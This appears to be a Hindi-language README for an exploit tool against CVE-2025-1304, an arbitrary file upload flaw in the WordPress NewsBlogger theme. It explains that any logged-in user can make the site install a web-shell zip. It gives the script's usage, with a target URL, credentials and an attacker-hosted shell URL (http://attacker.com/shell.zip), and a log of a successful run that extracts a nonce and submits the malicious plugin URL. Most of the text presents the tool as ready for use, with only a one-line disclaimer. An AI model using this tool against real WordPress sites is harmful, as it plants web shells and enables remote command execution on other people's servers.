
WordPress NewsBlogger थीम <= 0.2.5.1 में मनमाना फ़ाइल अपलोड भेद्यता मौजूद है।
CVSS स्कोर: 8.8 (उच्च)
भेद्यता प्रकार: मनमाना फ़ाइल अपलोड
घटक: WordPress थीम
CVE ID: CVE-2025-1304
NewsBlogger WordPress थीम (संस्करण <= 0.2.5.1) एडमिन वेलकम पैनल के माध्यम से मनमाना फ़ाइल अपलोड की भेद्यता से ग्रस्त है।
यह भेद्यता किसी भी प्रमाणित उपयोगकर्ता को — न्यूनतम सब्सक्राइबर भूमिका वाले उपयोगकर्ताओं सहित — वेब शेल युक्त दुर्भावनापूर्ण .zip संग्रह अपलोड करने की अनुमति देती है।
अपलोड एक अमान्य प्लगइन URL फ़ील्ड के माध्यम से होता है, जो अपलोड की गई फ़ाइल की सामग्री या प्रकार को ठीक से सत्यापित करने में विफल रहता है।
एक सफल हमला वेबसाइट के पूर्ण समझौते का कारण बन सकता है, जिसमें दूरस्थ कमांड निष्पादन और विशेषाधिकार वृद्धि शामिल है।
यह Python स्क्रिप्ट निम्नलिखित तरीकों से भेद्यता के शोषण को स्वचालित करती है:
nonce को गतिशील रूप से निकालना।python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।
द्वारा: Nxploited ( Khaled Alenazi )